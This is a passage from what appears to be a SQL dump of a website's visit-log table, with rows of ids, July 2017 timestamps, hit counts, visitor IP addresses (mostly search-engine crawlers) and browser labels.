77,1500599138,1,1,0,0,'178.154.200.64','other'),(135178,1500599142,1,1,0,0,'5.255.253.28','other'),(135179,1500599311,1,1,0,0,'141.8.142.154','other'),(135180,1500599538,1,1,0,0,'87.250.224.7','other'),(135181,1500599917,1,1,0,0,'51.255.65.42','other'),(135182,1500600132,1,1,0,0,'87.250.224.4','other'),(135183,1500600151,2,2,0,0,'95.108.181.26','other'),(135184,1500600173,2,2,0,0,'141.8.142.48','other'),(135185,1500600334,1,1,0,0,'87.250.224.24','other'),(135186,1500600406,2,2,0,0,'178.154.149.3','other'),(135187,1500600460,1,1,0,0,'87.250.224.7','other'),(135188,1500600492,1,1,0,0,'95.108.179.15','other'),(135189,1500600718,1,1,0,0,'51.255.65.70','other'),(135190,1500601259,2,2,0,0,'91.209.11.236','other'),(135191,1500601429,2,2,0,0,'141.8.142.164','other'),(135192,1500601485,1,1,0,0,'5.255.253.63','other'),(135193,1500601977,1,1,0,0,'8.29.198.25','other'),(135194,1500601986,1,1,0,0,'141.8.142.49','other'),(135195,1500602215,1,1,0,0,'207.46.13.123','other'),(135196,1500602242,1,1,0,0,'87.250.224.18','other'),(135197,1500602245,1,1,0,0,'5.255.253.58','other'),(135198,1500602249,2,2,0,0,'54.165.59.7','other'),(135199,1500602255,1,1,0,0,'5.255.253.43','other'),(135200,1500602439,3,3,0,0,'91.209.11.236','other'),(135201,1500602534,1,1,0,0,'217.182.132.25','other'),(135202,1500602689,1,1,0,0,'217.182.132.179','other'),(135203,1500603113,1,1,0,0,'51.255.71.123','other'),(135204,1500603152,1,1,0,0,'217.69.133.194','other'),(135205,1500603186,1,1,0,0,'141.8.142.154','other'),(135206,1500603281,1,1,0,0,'141.8.142.28','other'),(135207,1500603561,1,1,0,0,'95.108.179.8','other'),(135208,1500603585,1,1,0,0,'93.158.152.59','other'),(135209,1500603808,1,1,0,0,'95.108.179.15','other'),(135210,1500603897,1,1,0,0,'95.108.213.34','other'),(135211,1500604223,1,1,0,0,'5.255.253.43','other'),(135212,1500604892,3,3,0,0,'216.244.66.246','other'),(135213,1500605437,1,1,0,0,'164.132.162.164','other'),(135214,1500605529,2,2,0,0,'91.209.11.236','other'),(135215,1500605675,1,0,1,0,'66.249.76.93',''),(135216,1500605733,1,1,0,0,'216.244.66.194','other'),(135217,1500606079,1,1,0,0,'141.8.142.154','other'),(135218,1500606611,2,0,2,0,'66.249.76.107',''),(135219,1500608026,1,1,0,0,'178.154.200.64','other'),(135220,1500608029,1,1,0,0,'95.108.213.8','other'),(135221,1500608101,1,1,0,0,'141.8.142.38','other'),(135222,1500608273,2,2,0,0,'91.209.11.236','other'),(135223,1500608575,1,1,0,0,'204.79.180.4','msie'),(135224,1500608642,1,1,0,0,'217.182.132.63','other'),(135225,1500608715,1,1,0,0,'40.77.167.123','other'),(135226,1500608731,1,1,0,0,'178.154.189.21','other'),(135227,1500608934,1,1,0,0,'40.77.167.84','other'),(135228,1500609091,1,1,0,0,'178.154.189.16','other'),(135229,1500609580,1,1,0,0,'217.182.132.181','other'),(135230,1500609760,1,0,1,0,'66.249.76.107',''),(135231,1500610893,1,1,0,0,'217.182.132.192','other'),(135232,1500610896,1,1,0,0,'178.154.149.1','other'),(135233,1500610981,1,0,1,0,'66.249.76.93',''),(135234,1500611041,1,1,0,0,'141.8.132.72','other'),(135235,1500611058,1,1,0,0,'217.182.132.23','other'),(135236,1500611372,1,1,0,0,'217.182.132.7','other'),(135237,1500611489,1,1,0,0,'91.209.11.236','other'),(135238,1500611679,1,1,0,0,'51.255.65.54','other'),(135239,1500611694,1,1,0,0,'91.196.178.67','firefox'),(135240,1500612026,1,1,0,0,'178.154.189.21','other'),(135241,1500612154,1,1,0,0,'93.158.152.60','other'),(135242,1500612190,1,1,0,0,'87.250.224.24','other'),(135243,1500612398,1,1,0,0,'176.193.126.75','msie'),(135244,1500612494,1,1,0,0,'141.8.132.43','other'),(135245,1500612655,1,1,0,0,'217.182.132.97','other'),(135246,1500612772,1,0,1,0,'66.249.66.155',''),(135247,1500612795,1,1,0,0,'217.182.132.61','other'),(135248,1500612817,1,1,0,0,'8.29.198.25','other'),(135249,1500613025,1,1,0,0,'5.255.253.43','other'),(135250,1500613086,1,1,0,0,'95.108.213.8','other'),(135251,1500613238,2,2,0,0,'5.255.253.58','other'),(135252,1500613250,1,1,0,0,'178.154.200.64','other'),(135253,1500613253,1,1,0,0,'93.158.152.59','other'),(135254,1500613644,1,1,0,0,'91.209.11.236','other'),(135255,1500613722,1,1,0,0,'5.255.253.63','other'),(135256,1500614265,1,0,1,0,'66.249.66.76',''),(135257,1500614536,1,1,0,0,'91.196.177.46','firefox'),(135258,1500614613,1,1,0,0,'95.108.213.8','other'),(135259,1500614616,1,1,0,0,'5.255.253.28','other'),(135260,1500614735,2,2,0,0,'178.154.200.60','other'),(135261,1500615241,1,1,0,0,'217.182.132.90','other'),(135262,1500615260,1,1,0,0,'93.158.152.59','other'),(135263,1500615293,1,1,0,0,'141.8.132.72','other'),(135264,1500615318,1,1,0,0,'51.255.65.68','other'),(135265,1500615320,1,1,0,0,'141.8.132.50','other'),(135266,1500615475,1,1,0,0,'93.158.152.60','other'),(135267,1500615496,1,1,0,0,'216.244.66.194','other'),(135268,1500615710,1,0,1,0,'68.180.231.23',''),(135269,1500615838,1,1,0,0,'178.154.189.16','other'),(135270,1500615930,1,1,0,0,'51.255.65.88','other'),(135271,1500616224,2,2,0,0,'91.209.11.236','other'),(135272,1500616355,2,2,0,0,'87.250.224.24','other'),(135273,1500616374,1,1,0,0,'141.8.142.42','other'),(135274,1500616446,1,1,0,0,'91.196.177.46','chrome'),(135275,1500616727,1,1,0,0,'93.158.152.79','other'),(135276,1500616730,1,1,0,0,'141.8.142.97','other'),(135277,1500616770,1,0,1,0,'66.249.76.108',''),(135278,1500616870,1,1,0,0,'95.108.179.21','other'),(135279,1500617072,1,1,0,0,'46.48.13.161','chrome'),(135280,1500617206,1,1,0,0,'178.154.189.16','other'),(135281,1500617422,1,1,0,0,'141.8.142.164','other'),(135282,1500617667,1,1,0,0,'91.209.11.236','other'),(135283,1500618044,1,1,0,0,'217.182.132.74','other'),(135284,1500618136,1,1,0,0,'217.182.132.55','other'),(135285,1500619041,1,1,0,0,'91.196.178.166','chrome'),(135286,1500619166,1,1,0,0,'91.196.178.66','chrome'),(135287,1500619407,1,1,0,0,'51.255.71.100','other'),(135288,1500619458,1,1,0,0,'51.255.65.89','other'),(135289,1500619578,1,1,0,0,'137.74.207.101','other'),(135290,1500619636,1,1,0,0,'5.255.253.83','other'),(135291,1500620096,1,1,0,0,'66.249.76.93','chrome'),(135292,1500620192,1,1,0,0,'37.73.203.245','chrome'),(135293,1500620355,2,2,0,0,'91.209.11.236','other'),(135294,1500620833,1,1,0,0,'51.255.65.17','other'),(135295,1500620863,1,1,0,0,'35.161.116.11','firefox'),(135296,1500621127,1,1,0,0,'51.255.65.81','other'),(135297,1500621193,1,1,0,0,'141.8.132.25','other'),(135298,1500621773,1,1,0,0,'141.8.142.38','other'),(135299,1500621824,1,1,0,0,'217.182.132.69','other'),(135300,1500621888,1,1,0,0,'216.244.66.194','other'),(135301,1500621937,1,1,0,0,'137.74.207.188','other'),(135302,1500622192,1,1,0,0,'195.211.175.37','chrome'),(135303,1500622888,1,1,0,0,'94.178.182.119','chrome'),(135304,1500623069,1,1,0,0,'137.74.207.101','other'),(135305,1500623100,1,1,0,0,'40.77.167.84','other'),(135306,1500623175,1,1,0,0,'66.102.9.29','chrome'),(135307,1500623332,1,1,0,0,'51.255.65.91','other'),(135308,1500623465,1,0,1,0,'66.249.66.156',''),(135309,1500623626,1,1,0,0,'195.211.175.37','chrome'),(135310,1500623661,1,1,0,0,'8.29.198.26','other'),(135311,1500623763,1,1,0,0,'46.200.229.217','chrome'),(135312,1500623975,2,2,0,0,'54.165.59.7','other'),(135313,1500624010,1,1,0,0,'51.255.71.117','other'),(135314,1500624157,1,1,0,0,'217.69.133.6','other'),(135315,1500624366,1,1,0,0,'91.209.11.236','other'),(135316,1500624470,1,0,1,0,'68.180.230.48',''),(135317,1500624656,1,0,1,0,'66.249.76.91',''),(135318,1500624666,1,0,1,0,'66.249.66.74',''),(135319,1500624822,1,0,1,0,'66.249.76.89',''),(135320,1500625237,1,1,0,0,'217.69.133.2','other'),(135321,1500625394,3,3,0,0,'91.209.11.236','other'),(135322,1500626298,1,1,0,0,'51.255.65.50','other'),(135323,1500626482,1,0,1,0,'66.249.76.89',''),(135324,1500626557,1,1,0,0,'164.132.162.156','other'),(135325,1500626913,2,2,0,0,'91.209.11.236','other'),(135326,1500626918,2,0,2,0,'66.249.76.108',''),(135327,1500626962,1,0,1,0,'66.249.76.91',''),(135328,1500627465,1,0,1,0,'66.249.76.109',''),(135329,1500627796,1,1,0,0,'217.182.132.191','other'),(135330,1500627815,1,1,0,0,'217.182.132.60','other'),(135331,1500627847,1,1,0,0,'37.61.211.117','chrome'),(135332,1500627888,1,1,0,0,'51.255.65.22','other'),(135333,1500628152,2,2,0,0,'91.209.11.236','other'),(135334,1500628156,1,1,0,0,'141.8.142.164','other'),(135335,1500628260,1,1,0,0,'141.8.132.50','other'),(135336,1500628312,1,0,1,0,'66.249.76.89',''),(135337,1500629296,1,1,0,0,'51.255.65.20','other'),(135338,1500629333,1,1,0,0,'37.55.58.246','chrome'),(135339,1500629355,1,1,0,0,'178.154.200.60','other'),(135340,1500629690,1,1,0,0,'217.69.133.6','other'),(135341,1500629735,1,1,0,0,'91.196.178.68','firefox'),(135342,1500629942,1,1,0,0,'91.209.11.236','other'),(135343,1500630076,2,2,0,0,'216.244.66.194','other'),(135344,1500630154,1,1,0,0,'141.8.132.72','other'),(135345,1500630234,1,0,1,0,'66.249.76.108',''),(135346,1500630358,1,1,0,0,'5.255.253.63','other'),(135347,1500630437,1,1,0,0,'176.122.120.77','chrome'),(135348,1500630479,1,1,0,0,'141.8.142.164','other'),(135349,1500630880,1,1,0,0,'51.255.65.55','other'),(135350,1500631034,1,1,0,0,'31.43.26.138','chrome'),(135351,1500631174,1,1,0,0,'95.108.179.15','other'),(135352,1500631364,1,1,0,0,'195.211.175.37','chrome'),(135353,1500631689,1,1,0,0,'91.209.11.236','other'),(135354,1500631762,1,1,0,0,'5.255.253.63','other'),(135355,1500631828,1,1,0,0,'51.255.64.106','other'),(135356,1500631886,1,1,0,0,'178.154.200.64','other'),(135357,1500632110,1,1,0,0,'141.8.142.154','other'),(135358,1500632295,1,1,0,0,'180.76.15.144','other'),(135359,1500633932,1,1,0,0,'91.209.11.236','other'),(135360,1500634011,3,3,0,0,'5.45.207.32','other'),(135361,1500634238,1,1,0,0,'51.255.65.39','other'),(135362,1500634392,2,2,0,0,'5.45.207.64','other'),(135363,1500634575,1,1,0,0,'8.29.198.26','other'),(135364,1500634685,1,1,0,0,'66.249.76.108','chrome'),(135365,1500634788,1,1,0,0,'51.255.65.66','other'),(135366,1500634837,1,1,0,0,'207.154.254.166','chrome'),(135367,1500634850,1,1,0,0,'37.55.192.202','chrome'),(135368,1500634984,3,3,0,0,'5.45.207.32','other'),(135369,1500635011,1,1,0,0,'95.132.134.91','chrome'),(135370,1500635079,3,3,0,0,'213.180.203.32','other'),(135371,1500635358,4,4,0,0,'5.45.207.64','other'),(135372,1500635389,1,1,0,0,'164.132.162.153','other'),(135373,1500635510,5,5,0,0,'95.108.181.69','other'),(135374,1500635694,1,1,0,0,'195.64.190.1','msie'),(135375,1500636199,4,4,0,0,'216.244.66.194','other'),(135376,1500636208,1,1,0,0,'95.108.181.63','other'),(135377,1500636492,2,2,0,0,'5.45.207.64','other'),(135378,1500636507,4,4,0,0,'5.45.207.32','other'),(135379,1500636791,2,2,0,0,'213.180.203.32','other'),(135380,1500637045,1,1,0,0,'94.178.14.2','chrome'),(135381,1500637109,1,1,0,0,'95.108.181.69','other'),(135382,1500637272,1,1,0,0,'91.209.11.236','other'),(135383,1500637505,1,1,0,0,'51.255.71.118','other'),(135384,1500637943,2,2,0,0,'5.45.207.32','other'),(135385,1500638013,1,1,0,0,'51.255.71.123','other'),(135386,1500638047,1,1,0,0,'51.255.65.36','other'),(135387,1500638437,1,1,0,0,'5.45.207.64','other'),(135388,1500638574,1,1,0,0,'213.180.203.32','other'),(135389,1500638604,2,2,0,0,'91.209.11.236','other'),(135390,1500638608,1,1,0,0,'217.182.132.61','other'),(135391,1500638686,1,1,0,0,'51.255.65.33','other'),(135392,1500638952,1,0,1,0,'66.249.76.91',''),(135393,1500639762,1,1,0,0,'5.45.207.32','other'),(135394,1500639998,1,1,0,0,'51.255.65.66','other'),(135395,1500640058,1,1,0,0,'91.196.178.70','chrome'),(135396,1500640463,2,2,0,0,'216.244.66.194','other'),(135397,1500640507,1,1,0,0,'216.244.66.246','other'),(135398,1500640714,1,1,0,0,'217.182.132.240','other'),(135399,1500640749,1,1,0,0,'5.45.207.32','other'),(135400,1500641095,1,1,0,0,'51.255.71.129','other'),(135401,1500641442,1,1,0,0,'91.196.177.46','chrome'),(135402,1500641611,2,2,0,0,'91.209.11.236','other'),(135403,1500641765,4,4,0,0,'5.45.207.64','other'),(135404,1500641797,1,1,0,0,'217.69.133.194','other'),(135405,1500642238,1,0,1,0,'68.180.230.48',''),(135406,1500642851,1,1,0,0,'5.45.207.32','other'),(135407,1500642956,1,1,0,0,'66.249.76.93','chrome'),(135408,1500642971,1,1,0,0,'137.74.207.159','other'),(135409,1500643018,1,1,0,0,'217.182.132.77','other'),(135410,1500643680,1,1,0,0,'217.182.132.60','other'),(135411,1500644020,1,0,1,0,'66.249.76.89',''),(135412,1500644609,1,1,0,0,'217.182.132.63','other'),(135413,1500644673,1,0,1,0,'66.249.76.91',''),(135414,1500644674,2,2,0,0,'91.208.145.231','chrome'),(135415,1500645427,1,1,0,0,'8.29.198.27','other'),(135416,1500645532,1,1,0,0,'5.45.207.64','other'),(135417,1500645764,1,1,0,0,'51.255.65.75','other'),(135418,1500645875,1,1,0,0,'5.45.207.32','other'),(135419,1500645966,1,1,0,0,'51.255.65.65','other'),(135420,1500646046,1,1,0,0,'216.244.66.246','other'),(135421,1500646080,1,1,0,0,'91.209.11.236','other'),(135422,1500646084,1,0,1,0,'66.249.76.107',''),(135423,1500646302,1,1,0,0,'83.149.126.98','other'),(135424,1500646665,1,1,0,0,'95.221.207.32','msie'),(135425,1500646720,1,0,1,0,'66.249.76.93',''),(135426,1500646890,3,3,0,0,'216.244.66.194','other'),(135427,1500646953,1,1,0,0,'213.180.203.32','other'),(135428,1500647127,1,1,0,0,'5.45.207.40','other'),(135429,1500647439,1,1,0,0,'217.182.132.67','other'),(135430,1500647784,2,1,1,0,'66.249.76.107',''),(135431,1500648260,1,1,0,0,'51.255.65.44','other'),(135432,1500648270,1,1,0,0,'91.196.178.70','firefox'),(135433,1500648456,1,1,0,0,'217.182.132.18','other'),(135434,1500648465,1,1,0,0,'51.255.65.34','other'),(135435,1500648598,2,2,0,0,'91.209.11.236','other'),(135436,1500648897,1,1,0,0,'213.180.203.32','other'),(135437,1500648940,1,0,1,0,'66.249.76.91',''),(135438,1500649083,1,1,0,0,'217.182.132.30','other'),(135439,1500649374,1,1,0,0,'217.182.132.95','other'),(135440,1500649388,1,1,0,0,'217.182.132.147','other'),(135441,1500649532,2,2,0,0,'5.45.207.64','other'),(135442,1500649712,1,1,0,0,'95.108.181.58','other'),(135443,1500649798,1,1,0,0,'5.45.207.26','other'),(135444,1500649854,1,1,0,0,'217.182.132.149','other'),(135445,1500649887,2,2,0,0,'207.46.13.123','other'),(135446,1500650061,1,1,0,0,'51.255.65.32','other'),(135447,1500650274,2,2,0,0,'37.9.113.94','other'),(135448,1500650424,2,2,0,0,'91.209.11.236','other'),(135449,1500650499,1,1,0,0,'51.255.64.106','other'),(135450,1500650644,1,1,0,0,'5.45.207.64','other'),(135451,1500650768,4,4,0,0,'216.244.66.246','other'),(135452,1500650831,1,1,0,0,'213.180.203.32','other'),(135453,1500650859,1,1,0,0,'66.249.76.89','chrome'),(135454,1500650986,1,1,0,0,'5.45.207.26','other'),(135455,1500651005,1,1,0,0,'66.249.76.91','chrome'),(135456,1500651440,1,1,0,0,'217.182.132.30','other'),(135457,1500651562,1,1,0,0,'91.196.178.129','chrome'),(135458,1500651619,1,1,0,0,'95.108.181.69','other'),(135459,1500651742,1,1,0,0,'217.69.133.6','other'),(135460,1500651771,3,3,0,0,'91.209.11.236','other'),(135461,1500651826,1,1,0,0,'5.45.207.64','other'),(135462,1500651982,1,1,0,0,'46.211.20.44','chrome'),(135463,1500652035,1,0,1,0,'66.249.76.93',''),(135464,1500652398,1,1,0,0,'217.182.132.157','other'),(135465,1500652449,1,1,0,0,'217.182.132.180','other'),(135466,1500652540,1,1,0,0,'95.108.181.69','other'),(135467,1500652670,1,0,1,0,'66.249.76.108',''),(135468,1500652917,1,1,0,0,'51.255.65.59','other'),(135469,1500653021,1,1,0,0,'217.182.132.69','other'),(135470,1500653189,2,2,0,0,'91.209.11.236','other'),(135471,1500653231,1,1,0,0,'95.108.181.63','other'),(135472,1500653393,1,1,0,0,'5.45.207.64','other'),(135473,1500653673,1,1,0,0,'5.45.207.15','other'),(135474,1500653699,1,1,0,0,'95.108.181.69','other'),(135475,1500653786,1,1,0,0,'5.45.207.32','other'),(135476,1500653890,1,0,1,0,'66.249.66.74',''),(135477,1500654214,1,1,0,0,'216.244.66.194','other'),(135478,1500654256,1,1,0,0,'95.108.181.63','other'),(135479,1500654486,1,1,0,0,'66.249.76.107','chrome'),(135480,1500654649,1,1,0,0,'66.249.66.157','chrome'),(135481,1500654940,1,1,0,0,'217.182.132.71','other'),(135482,1500654996,2,2,0,0,'51.255.65.3','other'),(135483,1500655279,1,1,0,0,'164.132.162.158','other'),(135484,1500655634,2,2,0,0,'5.45.207.32','other'),(135485,1500655663,1,1,0,0,'91.209.11.236','other'),(135486,1500655904,1,0,1,0,'66.249.76.89',''),(135487,1500656017,1,1,0,0,'180.76.15.156','other'),(135488,1500656132,1,1,0,0,'213.180.203.32','other'),(135489,1500656237,1,1,0,0,'5.45.207.42','other'),(135490,1500656281,1,1,0,0,'8.29.198.27','other'),(135491,1500656330,1,1,0,0,'95.108.181.69','other'),(135492,1500656650,1,1,0,0,'217.69.133.9','other'),(135493,1500656710,1,0,1,0,'66.249.76.108',''),(135494,1500656821,1,1,0,0,'91.196.178.33','chrome'),(135495,1500656915,1,1,0,0,'5.45.207.32','other'),(135496,1500657192,1,1,0,0,'51.255.65.83','other'),(135497,1500657232,1,1,0,0,'217.182.132.171','other'),(135498,1500657260,1,1,0,0,'217.182.132.35','other'),(135499,1500657473,1,1,0,0,'217.182.132.178','other'),(135500,1500657489,1,1,0,0,'91.209.11.236','other'),(135501,1500657838,1,1,0,0,'51.255.71.132','other'),(135502,1500657965,1,1,0,0,'216.244.66.246','other'),(135503,1500658183,2,2,0,0,'216.244.66.194','other'),(135504,1500658323,1,1,0,0,'217.182.132.92','other'),(135505,1500658552,1,0,1,0,'66.249.76.109',''),(135506,1500658755,3,3,0,0,'95.108.181.58','other'),(135507,1500659083,2,2,0,0,'91.209.11.236','other'),(135508,1500659118,1,0,1,0,'66.249.76.89',''),(135509,1500659197,1,1,0,0,'5.45.207.64','other'),(135510,1500659330,1,1,0,0,'95.108.181.69','other'),(135511,1500659402,1,1,0,0,'5.45.207.26','other'),(135512,1500659520,1,1,0,0,'5.45.207.42','other'),(135513,1500660466,1,1,0,0,'5.45.207.66','other'),(135514,1500660469,1,1,0,0,'37.9.113.128','other'),(135515,1500660632,1,1,0,0,'95.108.181.69','other'),(135516,1500661202,2,2,0,0,'91.209.11.236','other'),(135517,1500661240,1,1,0,0,'66.249.76.107','chrome'),(135518,1500661396,1,1,0,0,'95.108.181.63','other'),(135519,1500661450,3,3,0,0,'5.45.207.64','other'),(135520,1500661844,1,1,0,0,'217.182.132.185','other'),(135521,1500662069,1,1,0,0,'37.9.113.94','other'),(135522,1500662085,2,2,0,0,'5.45.207.42','other'),(135523,1500662246,1,1,0,0,'51.255.65.92','other'),(135524,1500662420,2,2,0,0,'5.45.207.32','other'),(135525,1500662424,1,1,0,0,'93.175.236.51','firefox'),(135526,1500662489,1,1,0,0,'217.182.132.16','other'),(135527,1500662543,1,1,0,0,'91.209.11.236','other'),(135528,1500662585,1,1,0,0,'5.45.207.26','other'),(135529,1500662615,1,1,0,0,'51.255.65.17','other'),(135530,1500662618,1,1,0,0,'95.108.181.58','other'),(135531,1500663081,1,1,0,0,'217.182.132.14','other'),(135532,1500663119,2,2,0,0,'216.244.66.246','other'),(135533,1500663196,1,0,1,0,'66.249.76.93',''),(135534,1500663217,1,1,0,0,'95.108.181.69','other'),(135535,1500663549,1,1,0,0,'37.52.21.145','chrome'),(135536,1500663748,1,1,0,0,'176.193.126.241','msie'),(135537,1500664285,1,1,0,0,'162.210.196.100','other'),(135538,1500664298,1,1,0,0,'91.209.11.236','other'),(135539,1500664379,1,1,0,0,'164.132.162.153','other'),(135540,1500664436,1,0,1,0,'68.180.230.48',''),(135541,1500664469,4,4,0,0,'216.244.66.194','other'),(135542,1500664582,1,1,0,0,'137.74.207.161','other'),(135543,1500664595,1,1,0,0,'217.182.132.175','other'),(135544,1500664701,1,1,0,0,'207.46.13.123','other'),(135545,1500664755,3,3,0,0,'95.108.181.58','other'),(135546,1500664854,1,1,0,0,'95.108.181.63','other'),(135547,1500664905,1,1,0,0,'40.77.167.84','other'),(135548,1500665074,2,2,0,0,'37.9.113.94','other'),(135549,1500665255,1,1,0,0,'37.9.113.78','other'),(135550,1500665362,2,0,2,0,'66.249.76.109',''),(135551,1500665441,1,0,1,0,'66.249.66.155',''),(135552,1500665760,1,1,0,0,'5.45.207.64','other'),(135553,1500666017,2,2,0,0,'91.209.11.236','other'),(135554,1500666024,1,1,0,0,'213.180.203.32','other'),(135555,1500666590,1,0,1,0,'66.249.76.109',''),(135556,1500666967,1,1,0,0,'95.108.181.63','other'),(135557,1500667126,1,1,0,0,'8.29.198.27','other'),(135558,1500667165,1,1,0,0,'37.9.113.94','other'),(135559,1500667209,1,1,0,0,'217.182.132.179','other'),(135560,1500668195,1,1,0,0,'51.255.71.116','other'),(135561,1500668411,1,1,0,0,'91.209.11.236','other'),(135562,1500668531,1,1,0,0,'217.182.132.81','other'),(135563,1500668762,1,0,1,0,'66.249.76.107',''),(135564,1500668893,1,1,0,0,'95.108.181.58','other'),(135565,1500669345,1,1,0,0,'37.9.113.138','other'),(135566,1500669356,1,1,0,0,'217.182.132.188','other'),(135567,1500669421,1,1,0,0,'109.173.52.191','chrome'),(135568,1500669450,1,1,0,0,'217.182.132.65','other'),(135569,1500669500,1,1,0,0,'207.154.250.140','other'),(135570,1500670270,1,0,1,0,'66.249.66.75',''),(135571,1500670651,1,1,0,0,'95.108.181.69','other'),(135572,1500670786,1,1,0,0,'217.182.132.185','other'),(135573,1500671128,1,1,0,0,'51.255.65.52','other'),(135574,1500671283,1,1,0,0,'216.244.66.194','other'),(135575,1500671456,1,1,0,0,'217.182.132.71','other'),(135576,1500672183,1,1,0,0,'51.255.71.112','other'),(135577,1500672305,1,1,0,0,'51.255.71.120','other'),(135578,1500673275,1,1,0,0,'51.255.65.65','other'),(135579,1500673501,1,1,0,0,'40.77.167.123','other'),(135580,1500673780,1,1,0,0,'51.255.65.86','other'),(135581,1500673857,1,1,0,0,'37.9.113.78','other'),(135582,1500673899,1,1,0,0,'91.209.11.236','other'),(135583,1500673908,1,1,0,0,'95.108.181.63','other'),(135584,1500674150,1,1,0,0,'213.180.203.32','other'),(135585,1500674501,1,1,0,0,'51.255.65.74','other'),(135586,1500674857,1,1,0,0,'217.69.133.194','other'),(135587,1500674864,1,0,1,0,'66.249.76.89',''),(135588,1500674920,1,1,0,0,'51.255.71.126','other'),(135589,1500675424,1,1,0,0,'91.209.11.236','other'),(135590,1500675846,2,2,0,0,'5.45.207.64','other'),(135591,1500676055,7,7,0,0,'216.244.66.194','other'),(135592,1500676115,1,1,0,0,'164.132.162.158','other'),(135593,1500676240,1,1,0,0,'51.255.65.23','other'),(135594,1500677207,1,1,0,0,'157.55.39.93','other'),(135595,1500677231,1,0,1,0,'66.249.76.109',''),(135596,1500677756,1,1,0,0,'91.209.11.236','other'),(135597,1500677971,1,1,0,0,'8.29.198.25','other'),(135598,1500678290,1,1,0,0,'51.255.65.34','other'),(135599,1500678656,1,1,0,0,'51.255.65.19','other'),(135600,1500679127,1,1,0,0,'91.209.11.236','other'),(135601,1500679289,1,1,0,0,'217.69.133.194','other'),(135602,1500679558,1,1,0,0,'217.182.132.67','other'),(135603,1500679639,1,1,0,0,'95.108.181.69','other'),(135604,1500679965,1,0,1,0,'66.249.66.75',''),(135605,1500680066,1,1,0,0,'51.255.71.129','other'),(135606,1500680253,1,1,0,0,'217.182.132.188','other'),(135607,1500680425,1,0,1,0,'66.249.76.93',''),(135608,1500680446,1,1,0,0,'40.77.167.123','other'),(135609,1500680641,1,1,0,0,'217.182.132.174','other'),(135610,1500680845,1,1,0,0,'217.182.132.157','other'),(135611,1500680969,1,1,0,0,'217.182.132.85','other'),(135612,1500681067,1,1,0,0,'66.249.76.109','chrome'),(135613,1500681118,1,0,1,0,'66.249.76.91',''),(135614,1500681240,1,0,1,0,'66.249.76.107',''),(135615,1500681382,1,1,0,0,'137.74.201.99','other'),(135616,1500681668,2,2,0,0,'216.244.66.194','other'),(135617,1500681855,1,1,0,0,'217.182.132.59','other'),(135618,1500682017,1,1,0,0,'217.182.132.14','other'),(135619,1500682141,1,1,0,0,'178.154.171.59','other'),(135620,1500682349,1,1,0,0,'51.255.65.63','other'),(135621,1500682392,1,1,0,0,'121.32.126.114','msie'),(135622,1500682421,1,1,0,0,'91.209.11.236','other'),(135623,1500682444,2,2,0,0,'66.249.66.74','chrome'),(135624,1500683046,1,1,0,0,'51.255.65.22','other'),(135625,1500683134,1,1,0,0,'95.108.181.60','other'),(135626,1500684203,1,1,0,0,'54.165.59.7','other'),(135627,1500684305,1,1,0,0,'164.132.162.187','other'),(135628,1500684651,3,1,2,0,'66.249.76.93',''),(135629,1500684728,1,1,0,0,'51.255.65.67','other'),(135630,1500684751,1,1,0,0,'91.209.11.236','other'),(135631,1500685001,1,1,0,0,'216.244.66.246','other'),(135632,1500685018,1,1,0,0,'66.249.76.91','chrome'),(135633,1500685248,1,1,0,0,'217.182.132.54','other'),(135634,1500685864,1,1,0,0,'217.69.133.3','other'),(135635,1500686742,1,1,0,0,'91.209.11.236','other'),(135636,1500686767,1,1,0,0,'216.244.66.194','other'),(135637,1500686807,1,1,0,0,'95.108.181.63','other'),(135638,1500686848,2,2,0,0,'37.9.113.138','other'),(135639,1500687007,1,1,0,0,'217.182.132.183','other'),(135640,1500687130,1,0,1,0,'66.249.66.157',''),(135641,1500687614,2,2,0,0,'216.244.66.246','other'),(135642,1500687651,1,0,1,0,'66.249.76.91',''),(135643,1500687812,1,1,0,0,'51.255.71.116','other'),(135644,1500687984,1,1,0,0,'137.74.207.108','other'),(135645,1500688079,1,1,0,0,'66.249.66.155','chrome'),(135646,1500688332,1,1,0,0,'91.209.11.236','other'),(135647,1500688638,1,1,0,0,'51.255.65.46','other'),(135648,1500688808,1,1,0,0,'8.29.198.25','other'),(135649,1500688919,1,1,0,0,'137.74.207.188','other'),(135650,1500689568,3,3,0,0,'91.209.11.236','other'),(135651,1500689723,1,1,0,0,'217.69.133.2','other'),(135652,1500690048,1,1,0,0,'5.45.207.66','other'),(135653,1500690995,1,1,0,0,'95.108.181.58','other'),(135654,1500691042,1,1,0,0,'217.182.132.72','other'),(135655,1500691193,1,1,0,0,'95.108.181.60','other'),(135656,1500691447,1,1,0,0,'91.209.11.236','other'),(135657,1500691647,2,0,2,0,'66.249.76.108',''),(135658,1500691778,1,1,0,0,'144.76.17.175','other'),(135659,1500691782,1,1,0,0,'37.9.113.128','other'),(135660,1500692569,1,1,0,0,'213.180.203.32','other'),(135661,1500692649,1,1,0,0,'51.255.65.40','other'),(135662,1500693013,1,1,0,0,'217.182.132.94','other'),(135663,1500693060,1,1,0,0,'217.182.132.95','other'),(135664,1500693265,1,1,0,0,'95.108.181.57','other'),(135665,1500693650,1,1,0,0,'91.209.11.236','other'),(135666,1500694028,1,1,0,0,'217.182.132.64','other'),(135667,1500694113,1,1,0,0,'213.180.203.14','other'),(135668,1500694331,1,1,0,0,'216.244.66.194','other'),(135669,1500694339,1,0,1,0,'66.249.76.107',''),(135670,1500694952,1,1,0,0,'40.77.167.42','other'),(135671,1500695189,1,1,0,0,'217.69.133.5','other'),(135672,1500695190,1,1,0,0,'217.69.133.2','other'),(135673,1500695193,1,1,0,0,'217.69.133.9','other'),(135674,1500695812,1,1,0,0,'128.69.217.153','msie'),(135675,1500695907,1,1,0,0,'217.182.132.241','other'),(135676,1500695998,1,1,0,0,'91.209.11.236','other'),(135677,1500696614,1,1,0,0,'54.165.59.7','other'),(135678,1500697015,3,3,0,0,'216.244.66.246','other'),(135679,1500697077,1,1,0,0,'37.9.113.138','other'),(135680,1500697085,1,1,0,0,'217.182.132.94','other'),(135681,1500697103,2,2,0,0,'91.209.11.236','other'),(135682,1500697107,1,1,0,0,'213.180.203.32','other'),(135683,1500697555,1,0,1,0,'66.249.76.89',''),(135684,1500697561,1,1,0,0,'5.45.207.83','other'),(135685,1500697735,1,1,0,0,'164.132.162.154','other'),(135686,1500698044,1,1,0,0,'66.249.76.108','chrome'),(135687,1500698139,1,1,0,0,'51.255.65.39','other'),(135688,1500698338,1,1,0,0,'37.9.113.138','other'),(135689,1500698733,1,1,0,0,'95.108.181.63','other'),(135690,1500699028,3,3,0,0,'91.209.11.236','other'),(135691,1500699176,1,1,0,0,'213.180.203.32','other'),(135692,1500699268,1,1,0,0,'51.25